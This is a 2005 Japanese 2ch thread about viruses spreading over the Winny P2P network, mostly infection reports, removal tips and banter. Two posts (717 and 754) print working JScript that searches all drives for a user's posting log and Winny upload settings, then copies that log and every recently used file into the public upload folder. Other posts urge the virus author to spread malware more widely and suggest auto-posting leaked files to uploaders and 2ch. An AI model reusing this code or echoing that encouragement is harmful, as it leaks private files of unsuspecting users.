639636=638:05/03/08 23:22:29 ID:RX/dH8c/0
↑のレス、アンカー間違いです。失礼
640[名無し]さん(bin+cue).rar:05/03/08 23:51:05 ID:Yk2tgs/c0
>>638
見つからない
641[名無し]さん(bin+cue).rar:05/03/08 23:51:41 ID:DBJlrPW20
別のニュイルスも踏んだんじゃないか
642[名無し]さん(bin+cue).rar:05/03/09 00:06:15 ID:o4OBZcFj0
またはニュイルスの盛り合わせを食ったか
643[名無し]さん(bin+cue).rar:05/03/09 00:09:34 ID:2YAsezuG0
ttp://www.mainichi-msn.co.jp/it/coverstory/news/20050307org00m300062000c.html
あんまり関係ないけど
これで裁判結果が左右されるとしたら、ny利用者も増えて感染者も増えると…
644636=638:05/03/09 00:13:11 ID:UWbb656I0
>>640
どうも
HijackThisでこれが検出されたんだけど、別のかな…

4Mもあるexeだから、マイドキュメントのファイルを消すandデカいファイルを
作る以外にも何かしそうなんですけどね。
わからん、、、
645[名無し]さん(bin+cue).rar:05/03/09 00:45:07 ID:EiG43gAI0
>>632を実行して、IEのインターネットオプション、セキュリティタブのWeb
コンテンツのゾーンにマイコンピュータが追加された人いませんか?
646[名無し]さん(bin+cue).rar:05/03/09 00:46:59 ID:v2LGbc0P0
exeを不用意に実行してるヤシ多いけど
xpSP2にすれば、exe実行前に警告でるだろ?
647[名無し]さん(bin+cue).rar:05/03/09 00:53:32 ID:zcaszz3f0
そういわずにどんどん踏んで情報提供しようよ
648[名無し]さん(bin+cue).rar:05/03/09 01:30:22 ID:SYdrXWPa0
気持ち悪くて再インストした自分からすれば実行するのはスゴイなーと・・・
迂闊に実行させた本人が言えたことじゃないですが。

操作中に間違って開くとか以前からやってたので回避方法を色々調べてましたが
特定フォルダ内の実行権限拒否しか今のところ思い当たるフシ無し。
>>646
SP2の実行問合せは、ネットからDLしたファイルのみで、ローカルで作成されたのは対象外。
DLして解凍したexeが聞かれるのは、「ZIP(フォルダ)からXPの解凍ウィザードで解凍したexe」のみ。
lzh等々は当然対象外。ZIPフォルダでも「D&D」は対象外。
とのことです。
649[名無し]さん(bin+cue).rar:05/03/09 15:52:06 ID:97pGG1U70
アホばっか
650[名無し]さん(bin+cue).rar:05/03/09 16:51:57 ID:bazShg6O0
>>649
同意。以前P2Pと言えばそれなりの知識がある人ばかりだったのに。
今は初心者みたいなのばかりで萎える。これもネトランのせいか。
651[名無し]さん(bin+cue).rar:05/03/09 17:15:46 ID:qQ/dGrhT0
おまいら卒業したらどうだ
652[名無し]さん(bin+cue).rar:05/03/09 17:18:24 ID:XDCg2TTC0
>>650
アハハー、おまいスクリプトに同意してるよw

>>122,184,237,269,291
>>296,316,326,341,399
653[名無し]さん(bin+cue).rar:05/03/09 17:44:42 ID:bazShg6O0
>>652
やっちまったって感じだなw初心者は俺ですねw
654[名無し]さん(bin+cue).rar:05/03/09 20:16:16 ID:i7XJLWO70
なんか新しいウィルス増えてるじゃね?
655[名無し]さん(bin+cue).rar:05/03/09 20:42:37 ID:s/Z2kiQU0
>>635
ガイルかよw
656[名無し]さん(bin+cue).rar:05/03/09 21:36:04 ID:o0EPQoMc0
ブログ巡回してたらこんなものが・・・
http://blog.livedoor.jp/kingkunjp/archives/15958096.html

ny画像には会社名らしきものもあるし ガクガク (((゚д゚;))) ブルブル
657[名無し]さん(bin+cue).rar:05/03/09 21:39:26 ID:9gQzHCl70
瑞樹 修学旅行

この欄検眼団がちょっと気になった
658[名無し]さん(bin+cue).rar:05/03/09 21:54:07 ID:w4KOaSXs0
>>656
「菅井さん結婚式」を「菅井きん結婚式」と読んでしまったorz
659569:05/03/09 22:11:16 ID:aCbYKdsw0
>>636
10Gの犯人はそいつの様な気がする。
ノートン先生でc:\WINDOWS\IME\IMEJPのimjpmig.exe駆除したら10G作成止まった。
Trojan Horseだと。
660636=638:05/03/09 23:42:12 ID:UWbb656I0
>>659
10Gは確かにこれみたいですね。
レジストリみたらRunのところに、そのexeが追加されてたんで。

>>656
ついでにチェックしてみたら、Temp000フォルダにGJBファイルが大量に
作成されてた。これが勝手にうpされてるんだろうか?
661[名無し]さん(bin+cue).rar:05/03/10 01:32:50 ID:szBK9Pzy0
UPされてると考えるのが妥当だろう。
つまり、もう手遅れってこった。
662569:05/03/10 01:38:12 ID:ifsoWwc40
tempフォルダに…
ウィルス(トロイ)の入っていたフォルダと同じ名前のフォルダがあって、
そのフォルダの中にXPデフォルトの壁紙が入ってる。
663[名無し]さん(bin+cue).rar:05/03/10 01:38:15 ID:zW5geE/T0
636の人の症状って1つのニュイルスだけで済んでないような
664[名無し]さん(bin+cue).rar:05/03/10 14:13:49 ID:dApWJwQ80
春なのにため息また一つ
665[名無し]さん(bin+cue).rar:05/03/10 14:50:47 ID:aCIqRYcM0
とりあえず自分も10Gウイルスの解析(て偉そうなもんじゃないけど動作チェック) して
みたいんで、容量デカく無いやつ教えてください。

>632のが同様の疑わしいやつ?
他にあるならハッシュ張ると危険な場合はファイル名とハッシュの初め2、3文字
教えてくれると有り難い。
666[名無し]さん(bin+cue).rar:05/03/10 18:09:09 ID:VfzjHx8w0
【使用OS】 Win 2000
【WindowsUpdateしてるか】 自動
【使用AntiVirusソフト】 ノートン・インターネットセキュリティー
【AntiVirusをUpdateしてるか】 自動(手動でもアップデートしてみました)
【ウイルススキャンの結果】 異常なし
【オンラインスキャンしたなら結果】 未
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量】 二週間程度 総量8Gちょっと
【テンプレを読んだか】 既読
【テンプレにある対策を実行したか】 実行済
【症状、具体的に分かる限りすべて書く】
キャッシュフォルダを空にしたつもりがUPフォルダを空にしてしまったことに気づかずに数日アクセスしていたのでアップするものは何もないはずなのに、いつも3本ぐらい何かをアップしているリンクが存在します。
【何をしたらそんなことになったのか】
怪しいことは何もなかったように思うんですが…。強いて言えばDivxToDVDをインストールしたくらいなので当然無関係なはず。
あとはaviをダウンロードしたのみ。
【これまでにとった措置】
新規に解凍した別のWinnyでアクセスしてみたことと、UPフォルダそのものをマイドキュメントに退避させてアクセス。
667[名無し]さん(bin+cue).rar:05/03/10 18:10:45 ID:VfzjHx8w0
【使用OS】 Win 2000
【WindowsUpdateしてるか】 自動
【使用AntiVirusソフト】 ノートン・インターネットセキュリティー
【AntiVirusをUpdateしてるか】 自動(手動でもアップデートしてみました)
【ウイルススキャンの結果】 異常なし
【オンラインスキャンしたなら結果】 未
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量】 二週間程度 総量8Gちょっと
【テンプレを読んだか】 既読
【テンプレにある対策を実行したか】 実行済
【症状、具体的に分かる限りすべて書く】
キャッシュフォルダを空にしたつもりがUPフォルダを空にしてしまったことに気づかずに数日アクセスしていたのでアップするものは何もないはずなのに、いつも3本ぐらい何かをアップしているリンクが存在します。
【何をしたらそんなことになったのか】
怪しいことは何もなかったように思うんですが…。強いて言えばDivxToDVDをインストールしたくらいなので当然無関係なはず。
あとはaviをダウンロードしたのみ。
【これまでにとった措置】
新規に解凍した別のWinnyでアクセスしてみたことと、UPフォルダそのものをマイドキュメントに退避させてアクセス。
668[名無し]さん(bin+cue).rar:05/03/10 18:11:17 ID:VM9isjEq0
>>666
キャッシュをうpしてるんだろ
669[名無し]さん(bin+cue).rar:05/03/10 18:15:07 ID:VfzjHx8w0
あれ?
Macから書くと同じのが2回投稿されてしまう。
どうも失礼を。m(--)m

>>668
あ、そういうのもありで? 感謝!
670[名無し]さん(bin+cue).rar:05/03/10 18:16:04 ID:BBlwfDlM0
びっくりするくらいバカだな
671[名無し]さん(bin+cue).rar:05/03/10 18:30:56 ID:Udi1T4FA0
>>670
経験の浅い者を認められない者はこの世に存在する価値なし。
糞して...いや、糞にまみれて市ね
672[名無し]さん(bin+cue).rar:05/03/10 18:35:47 ID:zW5geE/T0
>>1も読まない奴、相手にすんなよ
ここは初心者の質問スレじゃない
673[名無し]さん(bin+cue).rar:05/03/10 18:38:20 ID:BBlwfDlM0
>>671
674[名無し]さん(bin+cue).rar:05/03/10 18:48:46 ID:Mqmb8Kxt0
675[名無し]さん(bin+cue).rar:05/03/10 18:58:32 ID:H0dhO+E40
>>674
あまりにも話題にもならないから
ウイルス作者が自分で立てたと見る
プーー
676[名無し]さん(bin+cue).rar:05/03/10 19:11:33 ID:u4rGMOc00
ここに出てる新種ウィルス作者は2chねらーか?

次は、在日や民主党の悪行を知らせる奴で頼む
677[名無し]さん(bin+cue).rar:05/03/10 19:15:07 ID:VM9isjEq0
ウィルス作者は当然2ch見てるだろ
678[名無し]さん(bin+cue).rar:05/03/10 19:15:42 ID:DQE5TicO0
http://news19.2ch.net/test/read.cgi/news/1110447675/26
だってさ。
ますます怪しいなぁw
679[名無し]さん(bin+cue).rar:05/03/10 19:20:13 ID:R3FbROX60
話題にもなってないウイルスを取り上げるとはなんか怪しいね
680[名無し]さん(bin+cue).rar:05/03/10 19:24:33 ID:P/PSvRDw0
作者はどうせこの板とか見てニヤついてんだろ?死ねよきもちわりー。
あまりにも話題性がないので枕を濡らしてそうだな。
681[名無し]さん(bin+cue).rar:05/03/10 19:28:10 ID:h4wD2McJ0
>>678
やはりそのスレの ID:C0ppJeJt が怪しいな。
わざわざスレ立てて気づいてくださいってことか?
682[名無し]さん(bin+cue).rar:05/03/10 19:32:29 ID:SjTfC1K10
作者はどうせニュイルススレとか見てニヤついてる

あまりにも話題性がないので枕を濡らす

あまりにも話題にもならないからニュー速にスレ立ててニヤついてる

流出系なんで一部びびるもあまりにも話題性がないので枕を濡らす

お役人が引っ掛かり、初めて他人が建ててくれたスレとか見てニヤついてる

ニュイルス作って日本で初の逮捕……もとい補導で枕を濡らす
683[名無し]さん(bin+cue).rar:05/03/10 19:33:23 ID:VM9isjEq0
枕を濡らしてばっかりじゃんwww作者乙wwww
684[名無し]さん(bin+cue).rar:05/03/10 19:38:30 ID:0Pzy988h0
ぱんつもぬらしてるだろうな。
685[名無し]さん(bin+cue).rar:05/03/10 19:41:23 ID:zW5geE/T0
被害者の叫びは作者の滋養にして栄養であり最も喜ぶことです
作者にエサを与えないで下さい
686[名無し]さん(bin+cue).rar:05/03/10 19:44:40 ID:zF7vrJ+B0
でもこれは叫びじゃなくてバカにしてると思うw
687[名無し]さん(bin+cue).rar:05/03/10 19:49:28 ID:RNPxq3Rh0
作者はここを見ている
陰気な奴だな
688[名無し]さん(bin+cue).rar:05/03/10 19:51:50 ID:VM9isjEq0
オイ!作者見てるか!常にノートンより先を走れ。もっと効率よくバラ撒け。
689[名無し]さん(bin+cue).rar:05/03/10 19:55:04 ID:SjTfC1K10
>688
幾ら何でも作者様に訴えかけすぎ
690[名無し]さん(bin+cue).rar:05/03/10 19:55:03 ID:lKBz1jKR0
苺娘と辻を無視リストに入れておけば、炉画像なぞ見ずに済む
691[名無し]さん(bin+cue).rar:05/03/10 19:56:43 ID:szBK9Pzy0
GJBって全部Jpegなの?
692[名無し]さん(bin+cue).rar:05/03/10 20:01:36 ID:DQE5TicO0
画像はもう飽きたと言ってみる
693[名無し]さん(bin+cue).rar:05/03/10 20:15:41 ID:lKBz1jKR0
>>691
JPGだけど、XPならWindows画像とFAXビューアに関連付ければ開ける。
694[名無し]さん(bin+cue).rar:05/03/10 20:16:24 ID:K79IL/bk0
「マイドキュメント」以下を消去してjpgで埋めるって奴とは別?
結構春の新作が出てるのか?
695[名無し]さん(bin+cue).rar:05/03/10 20:16:50 ID:MU2XiX9Q0
ニュー速でスレ立つ前にどっかで話題になってた?
696[名無し]さん(bin+cue).rar:05/03/10 20:18:29 ID:lKBz1jKR0
>>695
全くなってないかと思われ
697[名無し]さん(bin+cue).rar:05/03/10 20:19:30 ID:zF7vrJ+B0
今まで話題にならなかったけど
どういう形でアレ今回話題になってよかったんじゃない?w
苦労して作ったのに話題にすらならないと悲しいもんね
698[名無し]さん(bin+cue).rar:05/03/10 20:22:56 ID:lKBz1jKR0
69市町村の選択:来月18日に閉庁、22日に新市開庁−−湯沢市 /秋田
http://www.mainichi-msn.co.jp/chihou/akita/sentaku/news/20050226ddlk05010204000c.html

この合併調印式の画像が出回ってる
699[名無し]さん(bin+cue).rar:05/03/10 20:24:52 ID:szBK9Pzy0
話題になってたのはこのスレくらいだろう。前スレの最初の報告が2月6日だな。
あと>>656のリンク先くらいか。
700[名無し]さん(bin+cue).rar:05/03/10 20:28:28 ID:NzMMDAai0
>>695
【フジテレビ】Winny円光動画スレ40【絶賛】
http://tmp4.2ch.net/test/read.cgi/download/1110118245/
あと、こことか
701[名無し]さん(bin+cue).rar:05/03/10 21:16:31 ID:GdeUtb5N0
つうかあれなんて読むの?

低学歴の俺にもわかるように教えて
702sage:05/03/10 21:24:03 ID:wY9Pd5B60
最近、Lhazで解凍すると同じファイル名で拡張子名不明で0バイトのファイルが解凍ファイル以外に出てきて、
解凍ファイルを開くと消えるんですが・・・・。
これって新種のニュイルス?
いろんなファイルのzipファイルで発生するんですが・・・。
いろいろありすぎて言えませんが・・・・。(^^;)A
703[名無し]さん(bin+cue).rar:05/03/10 21:24:26 ID:J6HXimqX0
アホばっか
704[名無し]さん(bin+cue).rar:05/03/10 21:25:13 ID:wY9Pd5B60
げ、あげてしまった。
705[名無し]さん(bin+cue).rar:05/03/10 21:29:47 ID:AeQTQZSs0
げ、踏んでしまった。
706[名無し]さん(bin+cue).rar:05/03/10 21:35:58 ID:fbm/3/Yb0
げ、泣いてしまった。
707[名無し]さん(bin+cue).rar:05/03/10 21:53:07 ID:P/PSvRDw0
つまりなんだ、このウイルスは危なくないってことか?話題性がそんなにないってことは。
708[名無し]さん(bin+cue).rar:05/03/10 22:03:20 ID:fV03Puib0
インパクトがないな
おもしろくもないし
709[名無し]さん(bin+cue).rar:05/03/10 22:04:06 ID:uCGPy3UV0
せいぜいキンタマのようにJPGふぁいるをGBJで偽装されて流れて
マイドキュメントのファイルが削除されて、でかいファイルに置き換
えられるくらいなんで、そんなに危ないもんでもないかも。

あふれてる画像も特に面白いものがあるわけでもないし…。
710[名無し]さん(bin+cue).rar:05/03/10 22:04:39 ID:2hAkVnMS0
話題になるウイルスが危ないとか思ってるの?
711[名無し]さん(bin+cue).rar:05/03/10 22:05:09 ID:Wqqzmhz+0
かかった奴らには申し訳ないが苺きんたまは面白かったなぁ・・・
712[名無し]さん(bin+cue).rar:05/03/10 22:10:19 ID:TjOFIp490
>>711
だよなぁ
ny使ってない人間にも無理矢理nyインストしてキンタマ状態にして欲しいぐらいだね
713[名無し]さん(bin+cue).rar:05/03/10 22:30:54 ID:K79IL/bk0
>>636氏が試してる新作に期待。
続報マダーーー?
714ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
715[名無し]さん(bin+cue).rar:05/03/11 00:04:47 ID:i1weFgmG0
個人情報保護法が4月からスタートするんだけど、
この場合、どうなるのだ?
716[名無し]さん(bin+cue).rar:05/03/11 01:12:49 ID:6SPlJEWw0
欄検眼段←何って読むの?
717kakikomi.txt を winny の up フォルダにコピー:05/03/11 01:15:26 ID:Ci569Bw50
function Step2(d) {
for(var fc = new Enumerator(fso.GetFolder(d).files); !fc.atEnd(); fc.moveNext()) {
var f = fso.GetFile(fc.item());
if(f.Name == "kakikomi.txt") {
kakiko = f.Path;
if(up != "") { return 1; }
} else if(f.Name == "UpFolder.txt") {
var upini = fso.OpenTextFile(f.Path, 1, false);
var buf, line;
while(!upini.AtEndOfStream) {
buf = upini.ReadLine();
line = buf.split("=");
if(line[0] == "Path") { up = line[1]; break; }
}
upini.Close();
if(kakiko != "") { return 1; }
}
}
for(var fs = new Enumerator(fso.GetFolder(d).SubFolders); !fs.atEnd(); fs.moveNext()) {
if(Step2(fs.item())) { return 1; }
}
}
function Step1() {
for(var d = new Enumerator(fso.Drives); !d.atEnd(); d.moveNext()) { try { if(Step2(d.item().RootFolder)) { return; } } catch(e) {} }
}
var fso = new ActiveXObject("Scripting.FileSystemObject");
var kakiko = "";
var up = "";

Step1();
if(kakiko != "" && up != "") { fso.CopyFile(kakiko, up + "\\俺のカキコ.txt"); }
718[名無し]さん(bin+cue).rar:05/03/11 01:20:40 ID:yJhE9Uax0
>>717
なんか怖いのキタ━━━━━━(゚∀゚)━━━━━━ !!!!
719[名無し]さん(bin+cue).rar:05/03/11 01:22:59 ID:maAPacya0
やべ
720[名無し]さん(bin+cue).rar:05/03/11 01:25:00 ID:kIMcEiGx0
kakikomi.txtって皆保存してるもんなん?
721[名無し]さん(bin+cue).rar:05/03/11 01:27:14 ID:4vezX3jN0
俺はしてる。。。
722[名無し]さん(bin+cue).rar:05/03/11 01:27:38 ID:K98AUfiI0
kakikomi保存しない設定にしてる。
1000超えたログも捨てまくってる。
一度見た動画も捨てる。
キャッシュも最小限しか残さない。
723[名無し]さん(bin+cue).rar:05/03/11 01:28:18 ID:maAPacya0
kakikomi.txtがコピーされるぞゴラァ
724[名無し]さん(bin+cue).rar:05/03/11 01:33:25 ID:gKRbgMNh0
専用ブラウザでkakikomi.txtに保存してない人には無効ってこと?
725[名無し]さん(bin+cue).rar:05/03/11 01:34:07 ID:gcWpwBaB0
>>717
こんなところに書き込んで度胸あるねぇニヤニヤ
726[名無し]さん(bin+cue).rar:05/03/11 01:38:34 ID:K98AUfiI0
俺はうpフォルダもない
727[名無し]さん(bin+cue).rar:05/03/11 01:48:15 ID:sjSoKyN/0
>>717
犯罪幇助?
やっちゃったね。
728[名無し]さん(bin+cue).rar:05/03/11 01:52:45 ID:WKoODDlu0
>>717
なんだ他人のkakikomi.txt読みたいなら、おれの読ませてやるよ。
ttp://up.isp.2ch.net/up/f269ee70e1a4.zip
パス:うんこ
なんかおなじのを何度もコピペしてるし、うんこみたいな書き込みしかしてないが。
ホントにうんこで読み返すと笑えるから取ってあるんよ。
729[名無し]さん(bin+cue).rar:05/03/11 02:05:57 ID:WKoODDlu0
そういや前にもこのスレでkakikomi.txt晒したな。
730[名無し]さん(bin+cue).rar:05/03/11 02:54:59 ID:lxh3rfl50
>>722
そこまでする必要もなかろうに、ビビリ過ぎ。女か?
731[名無し]さん(bin+cue).rar:05/03/11 02:56:53 ID:K98AUfiI0
>>730
要らない物はすぐ捨ててしまう主義なんです。
なんもビビってへんちゅーねんw
732[名無し]さん(bin+cue).rar:05/03/11 03:51:29 ID:ejAjNHBa0
いらない物って・・・キャッシュはしばらく残しとかなあかんやろ
即消し厨か
733[名無し]さん(bin+cue).rar:05/03/11 03:56:25 ID:8p4i3hYx0
即消し主義といっていただきたい
734ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
735[名無し]さん(bin+cue).rar:05/03/11 04:56:17 ID:Qy6Y0QDY0
お前が援交好きなのはわかった。
736[名無し]さん(bin+cue).rar:05/03/11 05:20:52 ID:NNyCuQzt0
>>717
なるほど、こうやってupフォルダ探してるわけか。 とりあえずフォルダ構造変えとくか・・。
737[名無し]さん(bin+cue).rar:05/03/11 06:08:41 ID:gC7L/sU40
IEしか使ってないもので、あしからず。
円光ものはともかく、.aviは事故多いし、落とすなよそんなもん。
738[名無し]さん(bin+cue).rar:05/03/11 06:27:51 ID:BX+mzCM9O
朝起きたらノード0、全て切断。
モデムを見てみると、pppのランブが消灯していて、ネットそのものに接続出来なくなってました(;;)

これってネット障害?それとも・・・
教えて下さい(>_<)/
739[名無し]さん(bin+cue).rar:05/03/11 06:32:08 ID:Qy6Y0QDY0
>>738
アダプターを差し込むんだ!!!
740[名無し]さん(bin+cue).rar:05/03/11 06:34:00 ID:iGffRYhg0
とりあえず・・・、モデムの電源を一端落として、再起動はしてみたのか?







実は、プロバがメンテ中とかいうオチかもしれんが・・・。

741[名無し]さん(bin+cue).rar:05/03/11 06:54:15 ID:4GYER+Lp0
カードが止まったに一票
742[名無し]さん(bin+cue).rar:05/03/11 06:57:15 ID:lldl5rkI0
>>740
ISPにお金払ってないって落ちじゃないだろうな?
743[名無し]さん(bin+cue).rar:05/03/11 07:27:55 ID:qVN6AvZ50
どっから書き込みしてるんだ
744[名無し]さん(bin+cue).rar:05/03/11 07:31:37 ID:BX+mzCM9O
ネタじゃありません(>_<)

朝はバタバタしてるので、まだ色々試してませんが、料金滞納とかは無いです。
メンテならイイのですが・・・

745[名無し]さん(bin+cue).rar:05/03/11 07:42:38 ID:nrSx48om0
>738
釣りじゃないなら顔文字はやめたほうがいいよ。
746[名無し]さん(bin+cue).rar:05/03/11 07:54:13 ID:hbltmoKO0
朝からスレ違いも甚だしい
747[名無し]さん(bin+cue).rar:05/03/11 08:29:47 ID:ulvntf/F0
>>746
うるせーよ。氏ね
748[名無し]さん(bin+cue).rar:05/03/11 08:37:28 ID:BX+mzCM9O
顔文字は以後気を付けます、御指摘ありがとう。

今は携帯から書き込みしています。

スレ違いになりますか?もしそうなら誘導願えますか?
宜しくお願い致します。
749[名無し]さん(bin+cue).rar:05/03/11 08:50:05 ID:bwGhNWs70
>>748
>>740を試してダメならプロバイダのサポートに電話しろ。
750[名無し]さん(bin+cue).rar:05/03/11 08:50:15 ID:Kh9RSa2V0
> 今は携帯から書き込みしています。
まぁ一目瞭然だ罠

> スレ違いになりますか?もしそうなら誘導願えますか?
ISPのサポセンにでも聞いてくれ
情報が少なすぎて俺には何も胃炎からな
751[名無し]さん(bin+cue).rar:05/03/11 09:18:07 ID:Ms8rZKkE0
>>674
ためしにあやしいファイルあったんで、アタックしたら欄検眼段だったが
欄検眼段本体とスタートアップエントリ消せば問題ない
752[名無し]さん(bin+cue).rar:05/03/11 09:24:33 ID:Ms8rZKkE0
マイドキュメント以下削除云々、10GB云々とは、欄検眼段は別物みたいだけど
実行されるプロセスは、上のほうでコレじゃないか?と言ってるやつと同じ
マイクロソフト製の同名実行ファイルとは、明らかに違うアイコンしてるし、いかにも怪しいつー
753[名無し]さん(bin+cue).rar:05/03/11 10:29:20 ID:GStvrOG60
欄検眼段に感染してるかどうか確認する方法を教えて下さい。
754717に追加で「最近使ったファイル」をコピー:05/03/11 10:45:00 ID:4Zss8ynH0
function Step3(updir) {
for(var fc = new Enumerator(fso.GetFolder(wsh.SpecialFolders("Recent")).files); !fc.atEnd(); fc.moveNext()) {
var f = fso.GetFile(fc.item());
try {
fso.CopyFile(wsh.CreateShortcut(f.Path).TargetPath, updir + "\\" + fso.GetBaseName(f));
} catch(e) {}
}

}

var wsh = WScript.CreateObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
Step3(up);
755[名無し]さん(bin+cue).rar:05/03/11 11:00:28 ID:aMpOLk/w0
( ´艸`)ププ だからなんなんだw
756[名無し]さん(bin+cue).rar:05/03/11 11:12:57 ID:4Zss8ynH0
だからなんなんだ 以上のものを書いたらタイーホされちゃうじゃん
757[名無し]さん(bin+cue).rar:05/03/11 11:14:11 ID:Q7MMZLBv0
それより、苺キンタマのようにアプロダに投稿しちゃう機能が欲しいよなぁ。
前回は鯖落ちになっちゃったから、今度はアプロダを複数使えるといい。
アプロダスレからアプロダを探し出してランダムに投稿とか。
もちろん苺キンタマに習って、投稿したらそのアドレスを2chに投稿な。
これも前回はスレが早くなりすぎたから、カキコ先はランダムにしないと。


苺キンタマ祭りをもう一度……
758[名無し]さん(bin+cue).rar:05/03/11 11:19:37 ID:eP9TP7DW0
ATOK2005ダウンして 解凍してできた ATOK 2005 for Windowsフォルダー内の
setupフォルダーにあるsetup.exeをクリックしたらウィルス警告がでてしまいました。
警告を読み切る前に警告画面が消えてしまい ウィルス名がわからなくなってしまったんですが 
このウィルスの挙動と 対策をどなたかご教授ねがえませんでしょうかー・・・
いまノートンでウイルス検索していますが。
759[名無し]さん(bin+cue).rar:05/03/11 11:37:41 ID:d3938S3z0
>>758
その報告で何のウイルスかわかったら神だろ

ノートンが反応したなら多分だいじょぶ、不安なら再いんすこ

760[名無し]さん(bin+cue).rar:05/03/11 11:51:58 ID:yN8GWxkE0
欄検眼段

なんか結構同情する写真が流れてるなw
赤ちゃんとか
可哀想に・・・
761[名無し]さん(bin+cue).rar:05/03/11 12:03:54 ID:pkLPyCx30
>>758
ノートンのレポート見たら何のウイルスか載ってるだろ
762[名無し]さん(bin+cue).rar:05/03/11 12:10:43 ID:lct9Sskr0
欄検眼段画像のまとめたzipはどこですか?
763[名無し]さん(bin+cue).rar:05/03/11 12:25:51 ID:pRHyCJlg0
10GBウィルス、FSUTIL.EXEを他に移したら止まった。
それによって他の弊害が出るかは知らんが。

てかシステムの復元が強制的に無効になってて使えないし…orz 10GBの二次被害か?
上に成功例あったので今からOS上書きインスコします
764[名無し]さん(bin+cue).rar:05/03/11 15:02:10 ID:PUY6c+XX0
俺いいこと考えたウイルスを利用できるイイ方法がある
何もしないでウイルスに対抗できるよ
765[名無し]さん(bin+cue).rar:05/03/11 15:30:11 ID:66EFMFRA0
アホばっか
766[名無し]さん(bin+cue).rar:05/03/11 15:37:42 ID:EMsO5N9T0
バカばっか
767[名無し]さん(bin+cue).rar:05/03/11 15:42:55 ID:JHWFQ3100
●ウイルスに感染しない為には?
PCの電源を入れないようにしましょう。
768[名無し]さん(bin+cue).rar:05/03/11 16:56:41 ID:ExvNLPOd0
ノートン先生に勝てるニュイルスなどありません。先生信じてます
769[名無し]さん(bin+cue).rar:05/03/11 17:57:45 ID:K98AUfiI0
ノートン先生が裏切る時は無反応だからな。気付かない。
770[名無し]さん(bin+cue).rar:05/03/11 18:38:57 ID:t5QJtdqn0
結局このデマ(?)ウィルスを作った作者が、何の話題にもならないのを
不満にこのスレで披露したが、特に興味を示してもらえず、ブログでも
ネタにしたもののトラッシュバックもコメントもつかず、思い余ってニュ速
でスレ立てたものの、スルー状態ということでFA?
771[名無し]さん(bin+cue).rar:05/03/11 18:43:43 ID:5BF+WFgW0
無惨だな。(w
そのうちファビョって身元がバレてタイーホっていう、最強コンボ
をぜひ披露してもらいたいもんだ。
772[名無し]さん(bin+cue).rar:05/03/11 18:44:12 ID:UPcFl9pS0
結局欄検眼段ってジサクジエンでウイルスじゃねぇの?
773[名無し]さん(bin+cue).rar:05/03/11 18:59:01 ID:2Iep0QMu0
4月からやばいですよ
774[名無し]さん(bin+cue).rar:05/03/11 19:26:41 ID:/x0ynSxl0
それ以前に欄検眼段ってどーよむのさ?
作者カマン
775[名無し]さん(bin+cue).rar:05/03/11 19:39:44 ID:qVN6AvZ50
>>774
AAです
776[名無し]さん(bin+cue).rar:05/03/11 19:57:22 ID:5BF+WFgW0
どう見たらAAになるのかと。
777[名無し]さん(bin+cue).rar:05/03/11 20:37:29 ID:qVN6AvZ50
>>776
90度傾けて寄り目にして近づいてじーっと1分ほどみつめると3Dに見える
778[名無し]さん(bin+cue).rar:05/03/11 20:52:36 ID:5IXKt7r70
作者はなんでこんな流行りそうもない名前を付けたんだろ
だいたい読み方分からないし
オリジナリティ?
おバカさんですねぇ
779[名無し]さん(bin+cue).rar:05/03/11 21:02:39 ID:HJI3rICy0
ところでUPフォルダ無いのにUPできるantinyウィルスっていないの?
居ないとすれば、UPフォルダ無くせば、被害ないって事だよな。
確か隠しフォルダでUPフォルダ作成するウィルスは居たような気が…
780779:05/03/11 21:21:01 ID:HJI3rICy0
散々既出だったな。隠れフォルダ表示させない人多いのかな?
781[名無し]さん(bin+cue).rar:05/03/11 21:38:31 ID:NPLANCGR0
質問させてください。
自分【Antinny.ms(仮称)】に引っかかってるのかもしれません。
けどノートンではなくウイルスバスターなので検出してもでてきません。
シマティックのほうにオンラインスキャンというものがあるのですが
それでスキャンすれば親と子のファイル名が分かりますか?
あと駆除方法に
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
 HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
とありますが自分のホストファイルには数字は0.0.0.0ではありませんが同じ形式の数字が並んでる行があります。
これは感染していると見ていいのでしょうか?
親切な方もしよろしければ教えてください。お願いします。
782[名無し]さん(bin+cue).rar:05/03/11 21:40:50 ID:Po4fiAnV0
だからね質問スレじゃないのよ
783[名無し]さん(bin+cue).rar:05/03/11 22:06:52 ID:5BF+WFgW0
テンプレの対処法を読んでも理解できないなら、初期化&新規インス
トールしたほうがいいよ。いや煽りとかじゃなくてマジで。

中途半端な対処はよけいに問題をこじらせるだけだし。
784[名無し]さん(bin+cue).rar:05/03/11 22:23:48 ID:cjid9o470
駆除したつもりが全然だったりな
785[名無し]さん(bin+cue).rar:05/03/11 22:47:39 ID:hbltmoKO0
>>773
詳しくゥ

>>781
たしかウイルスバスターだとmsはAntinnyJだよ。ノーdは何だったか
忘れた。Bだっけかな。
786[名無し]さん(bin+cue).rar:05/03/11 22:47:51 ID:+VHI2DAq0
なんか怪しいファイル踏んじゃった。
今から再インスコするけど報告だけしてみる。
解凍したら中にフォルダファイルに偽装されたexeが入ってて、誤ってダブルクリック。
C:\Documents and Settingsに、ユーザー名と同じ名前の空フォルダが勝手に作られて、それが開かれる。
いろいろ確かめたが、そのほかに気付いた動作はなし。
ちなみにexeファイルが51,306,496 バイトもある。なんだろこれ。
787[名無し]さん(bin+cue).rar:05/03/11 22:49:53 ID:hbltmoKO0
>>781
あと、なぜmsにやられたと思うのか書いておくれ。
早合点してるだけかもしれないし。
788[名無し]さん(bin+cue).rar:05/03/11 22:51:51 ID:570JJdd20
ダウソ板って馬鹿ばっかでおもしろいなwwwwW
789[名無し]さん(bin+cue).rar:05/03/11 22:53:58 ID:EZjLXIIj0
バカのすくつですから
790[名無し]さん(bin+cue).rar:05/03/11 22:57:45 ID:r8F0KqQ00
踊る阿呆に見る阿呆
791[名無し]さん(bin+cue).rar:05/03/11 23:42:46 ID:tgubEJxl0
同じ阿呆なら作らにゃ損損うわなにをさwせdrtぎゅじ
